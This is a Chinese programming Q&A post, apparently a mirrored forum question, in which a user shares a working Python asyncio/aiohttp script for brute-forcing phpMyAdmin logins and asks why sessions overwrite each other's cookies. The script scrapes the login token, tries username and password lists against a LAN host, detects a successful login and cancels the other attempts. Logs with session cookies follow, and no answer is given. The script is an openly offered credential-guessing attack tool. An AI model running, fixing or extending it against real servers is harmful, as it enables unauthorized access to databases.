我使用asyncio和aiohttp请求phpmyadmin,不同的会话,但不同的会话覆盖cookie。 代码:
from asyncio import FIRST_COMPLETED
import aiohttp
import json
import re
import asyncio
from handle_log import logger
# 使用IP域名时,需要设置cookie
jar = aiohttp.CookieJar(unsafe=True)
async def handle_request(session, url, method, data=None, **kwargs):
"""处理请求"""
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
}
if method == "GET":
try:
async with session.get(url=url, headers=header) as response:
text = await response.text()
code = response.status
return code, text
except Exception as e:
# print(str(e))
return None, None
elif method == "POST":
try:
async with session.post(url=url, headers=header, data=data, allow_redirects=False) as response:
text = await response.text()
code = response.status
return code, text
except Exception as e:
# print(str(e))
return None, None
async def phpmyadmin_crack(host, username, password):
"""phpmyadmin密码爆破"""
async with aiohttp.ClientSession(cookie_jar=jar) as session:
logger.info("请求用户名:{},密码{},session:{}".format(username, password, id(session)))
url = host + "/phpmyadmin/index.php"
# 第一次请求获取token
first_code, first_response = await handle_request(session=session, url=url, method="GET")
if not first_response and first_code != 200:
# logger.info("第一次请求失败,用户名:{},密码{}".format(username, password))
return False
if first_code == 200:
# 获取token
token_search = re.compile(r'token=(.*?)"\s?target')
token = token_search.search(first_response)
if not token:
# logger.info("第一次请求未获取到token,用户名:{},密码{}".format(username, password))
return False
else:
token_value = token.group(1)
logger.info("第一次请求token:{},用户名:{},密码{},session:{}".format(token_value, username, password, id(session)))
login_url = host + "/phpmyadmin/index.php"
# 第二次请求登录
login_data = {
"pma_username": username,
"pma_password": password,
"server": "1",
"lang": "zh_CN",
"token": token_value
}
second_code, second_response = await handle_request(session=session, url=login_url,
method="POST",
data=login_data)
logger.info(
"第二次请求cookie{},用户名{},密码{},session:{}".format(session.cookie_jar.filter_cookies(login_url), username,
password, id(session)))
if not second_response and second_code != 302:
# logger.info("第二次请求失败,用户名:{},密码{}".format(username, password))
return False
else:
# 首页
logger.info("第三次请求,用户名:{},密码{},session:{}".format(username, password, id(session)))
index_url = host + "/phpmyadmin/main.php?token={}".format(token_value)
index_code, index_response = await handle_request(session=session, url=index_url,
method="GET")
if not index_response and index_code != 200:
# logger.info("第三次请求失败,用户名:{},密码{}".format(username, password))
return False
if index_code == 200:
if "常规设置" in index_response:
logger.info("登录成功cookie{},用户名{},密码{},session{}".format(session.cookie_jar.filter_cookies(index_url),
username, password, id(session)))
return token_value
async def main():
u = ["admin", "root"]
p = ["root", "ccc"]
for username in u:
tasks = [asyncio.create_task(phpmyadmin_crack("http://192.168.52.143", username, password)) for password in p]
done, pending = await asyncio.wait(tasks, return_when=FIRST_COMPLETED)
for i in done:
token_value = i.result()
if token_value:
# print(pending)
for j in pending:
j.cancel()
return
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
日志
2021-01-23 13:59:40,554 - 请求用户名:admin,密码root,session:61479400
2021-01-23 13:59:43,620 - 第一次请求token:83f68fe795cd035027e28b932e66af86,用户名:admin,密码root,session:61479400
2021-01-23 13:59:43,696 - 第二次请求cookieSet-Cookie: phpMyAdmin=02r13em816hravpjps4uh42o1mp37cqd
Set-Cookie: pmaPass-1=ZGyrDGMUOfY%3D
Set-Cookie: pmaUser-1=CWWqYangAdc%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=DIK05C9n3E4%3D,用户名admin,密码root,session:61479400
2021-01-23 13:59:43,697 - 第三次请求,用户名:admin,密码root,session:61479400
2021-01-23 13:59:40,556 - 请求用户名:admin,密码ccc,session:61479448
2021-01-23 13:59:40,683 - 第一次请求token:630fc3f0e38913813ae969b03be4e7d7,用户名:admin,密码ccc,session:61479448
2021-01-23 13:59:40,894 - 第二次请求cookieSet-Cookie: phpMyAdmin=l53onpkis8dq3n7cccscjmgqbjf3d0u2
Set-Cookie: pmaPass-1=YQH%2B4spnAT4%3D
Set-Cookie: pmaUser-1=eN9lDZNBfIk%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=VoKTF6Xhr34%3D,用户名admin,密码ccc,session:61479448
2021-01-23 13:59:40,894 - 第三次请求,用户名:admin,密码ccc,session:61479448
2021-01-23 13:59:42,141 - 请求用户名:root,密码root,session:61477480
2021-01-23 13:59:42,370 - 第一次请求token:f75a63d7b1a99ceede06913c2fa028ae,用户名:root,密码root,session:61477480
2021-01-23 13:59:42,502 - 第二次请求cookieSet-Cookie: phpMyAdmin=l53onpkis8dq3n7cccscjmgqbjf3d0u2
Set-Cookie: pmaPass-1=5gfZy4sGqjs%3D
Set-Cookie: pmaUser-1=5gfZy4sGqjs%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=VoKTF6Xhr34%3D,用户名root,密码root,session:61477480
2021-01-23 13:59:42,502 - 第三次请求,用户名:root,密码root,session:61477480
2021-01-23 13:59:43,845 - 登录成功cookieSet-Cookie: phpMyAdmin=02r13em816hravpjps4uh42o1mp37cqd
Set-Cookie: pmaPass-1=ZGyrDGMUOfY%3D
Set-Cookie: pmaUser-1=CWWqYangAdc%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=DIK05C9n3E4%3D,用户名root,密码root,session:61477480
2021-01-23 13:59:42,142 - 请求用户名:root,密码ccc,session:54297720
2021-01-23 13:59:42,503 - 第一次请求token:172c4fea1a9166732b23bda80efe80ad,用户名:root,密码ccc,session:54297720
2021-01-23 13:59:42,644 - 第二次请求cookieSet-Cookie: phpMyAdmin=l53onpkis8dq3n7cccscjmgqbjf3d0u2
Set-Cookie: pmaPass-1=YQH%2B4spnAT4%3D
Set-Cookie: pmaUser-1=5gfZy4sGqjs%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=VoKTF6Xhr34%3D,用户名root,密码ccc,session:54297720
2021-01-23 13:59:42,644 - 第三次请求,用户名:root,密码ccc,session:54297720
正确的用户名和密码是root:root aiohttp为什么会覆盖cookie
设置Cookie:pmaPass-1=5gfZy4sGqjs%3D
设置Cookie:pmaUser-1=5gfZy4sGqjs%3D
设置Cookie:pmaPass-1=ZGyrDGMUOfY%3D
设置Cookie:pmaUser-1=CWWqYangAdc%3D
目前没有回答
相关问题 更多 >
编程相关推荐